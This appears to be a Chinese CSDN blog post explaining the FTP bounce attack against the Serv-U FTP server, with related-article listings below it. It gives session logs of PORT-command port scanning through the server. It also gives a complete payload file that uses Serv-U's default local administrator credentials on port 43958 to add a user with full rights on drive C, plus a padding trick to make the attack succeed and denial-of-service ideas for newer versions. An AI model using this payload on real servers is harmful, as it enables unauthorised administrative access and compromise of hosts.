Serv-U的反弹攻击及其利用

最新推荐文章于 2022-07-01 16:11:14 发布
最新推荐文章于 2022-07-01 16:11:14 发布
阅读量1.2w 收藏
点赞数
分类专栏: 技术文档 文章标签: user 服务器 disk command list access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lake2/article/details/1314149
版权

Authorlake2 ( http://lake2.0x54.org )

 

FTP反弹攻击(FTP Bounce Attack)是很古老的技术了,居然能在我们的信息安全教材上找得到介绍,可见其确实年代久远。

所谓FTP反弹攻击就是利用FTP协议的PORT命令将数据发送到第三方,这样就可以利用FTP服务器实现对其他机器的端口扫描和发送数据了。由于这种攻击的存在,所以FTP服务器一般都限制了PORT命令的ip地址为客户端ip且端口大于1024

现在比较流行的FTP软件Serv-U默认情况下(似乎?)却没有限制FTP Bounce攻击,造成安全隐患。

以下是对有限制的Serv-U进行反弹攻击:

 

220-欢迎光临lake2blog

user lake2

331 User name okay, need password.

pass xxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

530 Only client IP address allowed for PORT command.

 

失败了,因为管理员在设置那里勾上了“拦截FTP Bounce攻击”。

但是,一些Serv-U却可以实现反弹(默认情况下没有阻止FTP Bounce):

 

220-欢迎使用本虚拟主机.

user 0x54.org

331 User name okay, need password.

pass xxxxxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

226-Maximum disk quota limited to 204800 kBytes

    Used disk quota 81766 kBytes, available 123033 kBytes

226 Transfer complete.

port 127,0,0,1,171,183

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

426-Maximum disk quota limited to 204800 kBytes

    Used disk quota 81766 kBytes, available 123033 kBytes

426 Data connection closed, transfer aborted.

 

命令“port 127,0,0, 1,171,182 就是把数据发送到FTP服务器的43958171*256+182=43958)端口,因为该端口是开放的,所以数据发送成功;第二次把数据发送到43959端口,该端口关闭,所以发送失败。根据返回的结果,就实现了端口扫描(由于限制,只能扫描大于1024的端口)。大名鼎鼎的扫描器NMAP就有利用FTP反弹实现端口扫描的功能。

利用反弹攻击也可以发送任意数据,把要发送的数据写到文件中然后RETR就行了。既然可以发送任意数据,当然包括向43958端口发送添加有执行权限的FTP用户的命令咯。这真是个令人兴奋的主意。

以下内容保存为test.txt并传到FTP根目录:

 

user LocalAdministrator

Pass #l@$ak#.lk;0@P

SITE MAINTENANCE

-SETUSERSETUP

-IP= 0.0.0 .0

-PortNo=21

-User=lake

-Password=admin123

-HomeDir=c:/

-LoginMesFile=

-Disable=0

-RelPaths=1

-NeedSecure=0

-HideHidden=0

-AlwaysAllowLogin=0

-ChangePassword=0

-QuotaEnable=0

-MaxUsersLoginPerIP=-1

-SpeedLimitUp=0

-SpeedLimitDown=0

-MaxNrUsers=-1

-IdleTimeOut=600

-SessionTimeOut=-1

-Expire=0

-RatioUp=1

-RatioDown=1

-RatiosCredit=0

-QuotaCurrent=0

-QuotaMaximum=0

-Maintenance=None

-PasswordType=Regular

-Ratios=None

 Access=c:/|RWAMELCDP

 

 

然后retr test.txt,添加用户的数据就发过去了。

每次都莫名其妙的添加失败,后来试验多次才发现是由于数据发送太快43958端口那边还没来得及响应连接就就关闭了。解决办法是在test.txt文件前面添加许多无用数据,当文件达到 1M 多的时候,哈哈,成功了!

以上是在5.2版本的情况,但在6.3版本上,情况不妙,43958端口限制了接收数据大小,几十K都不行了,何况一个 1M 的大文件呢。

这个地方一直没想到好的解决办法,似乎有两点思路供参考:

1、  上传/下载大文件,降低其处理速度

2、  FTP服务器进行拒绝服务攻击,消耗资源降低处理速度

以上只是猜想没有去实践,姑且叫“lake2猜想”吧,谁把它解决了,我请吃饭哦^_^

 
lake2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 16
    评论
专栏目录
SERV-U 的配置文件详解
01-11
SERV-U的目录文件结构说明 Servudaemon.exe serv-u的服务程序,主文件 Servudaemon.ini serv-u的配置文件,记录用户信息,服务器参数 Seruadmin.exe serv-u管理界面 Servuadmin.ini serv-u管理界面配置文件 Servutray.exe serv-u系统托盘程序 SERV-U配置文件例子 [GLOBAL] Version=5.0.0.0 RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKrowsPF//h4YObIvknAH/
论 FTP bounce 攻击
FreeXploiT
11-13 9805
发布日期:2002-09-17文章内容: 作者:scz 主页:http://www.nsfocus.com日期:2002-01-20目录:    1.  前言    2.  一个直观的FTP bounce攻击举例    3.  关于上例中所涉及端口的讨论    4.  SPARC/Solaris 7缺省携带的FTP Server所存在的问题    5.  x86/FreeBSD 4.3-R
运维安全系列基础服务之 FTP 服务(系列一)
weixin_33704591的博客
12-30 165
做了多年运维工程师,积攒了一些经验,和大家分享下。个人认为,运维安全话题的系列,主要包括下面四个方面: 基础服务 网络层 应用层 云安全 今天主要讲的是基础服务里面的FTP服务。 文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议。它属于网络传输协议的应用层。 FTP 是一个8位...
FTP协议及相关漏洞
weixin_45253216的博客
03-09 4671
1.ftp简介 网络文件共享服务主流的主要有三种,分别是ftp,nfs,samba。 FTP是File Transfer Protocol(文件传输协议)的简称,用于internet上的控制文件的双向传输。 FTP也是一个应用程序,基于不同的操作系统有不同地FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,我们经常会遇到两个概念:下载和上传。 下载(Downloa...
Windows 2003 Server安全配置完整篇
jtaosj的专栏
04-04 462
一、先关闭不需要的端口我比较小心,先关了端口。只开了3389 21 80 1433有些人一直说什么默认的3389不安全,对此我不否认,但是利用的途径也只能一个一个的穷举爆破,你把帐号改了密码设置为十五六位,我估计他要破上好几年,哈哈!办法:本地连接--属性--Internet协议(TCP/IP)--高级--选项--TCP/IP筛选--属性--把勾打上 然后添加你需要的端口即可。PS一句:设置完
Windows 2003 Server 相关安全设置
04-01 773
1、磁盘权限  系统盘只给 Administrators 组和 SYSTEM 的完全控制权限其他磁盘只给 Administrators 组完全控制权限  系统盘/Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限  系统盘/Documents and Settings/All Users 目录只给 Administrator
Serv-U V15.2.1 多国语言版.zip
12-27
内含文件列表: SU-FTP-Server-Windows-v15.2.1.exe Serv-U 快速安装说明.pdf Serv-U典型应用配置.pdf 100%成功安装手册.txt
serv-U注册机破解licences
06-20
1. Serv-U软件注册机程序,亲测可用,支持官方下载的最新版本的Serv-U 15.0.1.20多国语言安装程序 2. 使用方法:先安装Serv-U程序,安装成功后退出所有Serv-U相关的程序和服务,将注册机程序复制到Serv-U的安装目录...
图解经典FTP服务器工具 SERV-U最安全的设置【防止被入侵】
01-11
作为一款精典的FTP服务器软件,SERV-U一直被大部分管理员所使用,它简单的安装和配置以及强大的管理功能的人性化也一直被管理员们称颂。但是随着使用者越来越多,该软件的安全问题也逐渐显露出来。  首先是SERV-U...
Serv-U 550 Permission denied 的解决办法
09-30
昨天一客户反应他的CuteFTP只能建文件夹,没法删除及上传文件
6-2漏洞利用-ftp不可避免的问题
山兔的博客
07-01 932
Windows下 CMD命令添加用户、以及提升Administrator管理员权限,之后这个用户将做为登录FTP的用户名和密码 windows下 FTP服务器添加用户,否则我们就不能使用我们添加的admin1用户登录打开iis管理器使用medusa暴力破解工具来破解admin1用户的密码在最后输出了对应的用户名密码先用nc连接一下ftp服务 连接成功只有在输入正确的账号密码的情况下,才会登录成功 可以看到,我们在最后发现了用户名密码,我们也可以不知道用户名、密码进行破解这个时候,我们就可以用nc登录FT
端口扫描之FTP反弹扫描
asdushf的博客
12-26 1862
FTP反弹扫描 文章目录FTP反弹扫描前言漏洞原理漏洞利用工具利用Nmap 前言 FTP反弹攻击的概念有Hobbit最早公之于众。1995年,在Bugtraq上发布的一篇文章里,Hobbit指出了FTP协议中的某些内在缺陷。大体上说FTP反弹攻击时一种狡诈的洗劫FTP服务器连接的方法,它滥用了对代理FTP连接的支持技术,尽管有点过时,但是依旧可以帮助你理解可能被黑客用来攻击你的各种途径。 漏洞原理 所谓的FTP反弹攻击就是利用FTP协议的PORT命令将数据发送到第三方,这样就可以利用FTP服务器
FTP 跳转攻击
mgxcool的专栏
09-06 8527
FTP主动模式中,客户端向服务器发送port命令,指定ip和端口号,服务器收到后,会从80端口发起数据连接。PORT命令格式如下: PORT A,B,C,D,E,F 服务器解析后,参数的前四个字段,作为地址A.B.C.D,对应的数据连接的目标端口为E*256+F。   ftp的这个特性,被利用的话,可以导致安全问题。假设A.B.C.D是一个邮件服务器,那么如果E,F的值算出
ftp文件服务器攻击,serv-U FTP软件的攻击防守修改教程[图文]
weixin_33335559的博客
08-09 631
在看这篇文章之前,有几点要注意1、everyone用户完全控制目录在服务器上绝对不能出现2、WEB目录上的权限都是独立的一般情况下是读取和写入,无运行权利3、ipsec做了限定相关出入站端口访问Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Serv-u V3.x以上的版本默认本地管理端口是:127.0.0.1:43958,所以只能本机连接,默认管理员:LocalAdmini...
java当中socket使用 Server-U 的ftp 代码指令
znit2003的专栏
05-03 1761
1开头-成功 2开头-成功 3开头-权限问题 4开头-文件问题 5开头-服务器问题 150 FILE: %s 150 Opening %s mode data connection for %s (%I64d Bytes). 150 Opening %s mode data connection for %s. 150 Opening ASCII mode data
ftp中遇到的Entering Extended Passive Mode问题
热门推荐
从菜鸟到菜菜鸟
12-16 5万+
<br />在sels10机器上登入ftp输入用户名和密码之后再ls发现出现如下问题Entering Extended Passive Mode<br /> <br />ftp> ls<br /> 229 Entering Extended Passive Mode (|||51374|)<br /> <br />要解决这种情况,ctrl+c后输入epsv4 off回车即可。<br /> <br />ftp> epsv4 off<br /> EPSV/EPRT on IPv4 off.<br /> f
linux ftp拒绝访问,linux下FTP拒绝(ftp: connect: Connection refused)
weixin_39899691的博客
05-05 1843
ftp> open 192.168.1.98ftp: connect: Connection refusedbash解决办法:app[root@rac1 etc]# vsftpd /etc/vsftpd/vsftpd.conf &[1] 9555[root@rac1 etc]#.net再次FTP时问题已经解决server若是有下面的问题,说明ftp服务没有装,能够重装后再试:blog...
脚本引擎:Nmap Scripting Engine
Vdieoo的博客
11-12 961
Nmap最强大,最灵活的功能之一NSE脚本引擎 它允许用户自己编写脚本来执行自动化的操作或者扩展Nmap的功能,使用lua语言 基本使用 NSE默认就提供了丰富的脚本库,可以为我们提供诸多Nmap的扩展使用,它的设计初衷主要考虑了一下几个方面: 网络发现 版本侦察 漏洞侦察 后门侦察 漏洞利用 nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式及进行比较笼统的扫描 auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域...
serv-u 10.5.0.24
最新发布
01-20
serv-u是一种用于文件传输的服务器软件。在给定的问题中,10.5.0.24则是指serv-u所部署的服务器的IP地址。 serv-u 10.5.0.24是指该服务器上运行的serv-u版本为10.5.0.24。该版本可能是serv-u软件的某个特定版本,该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值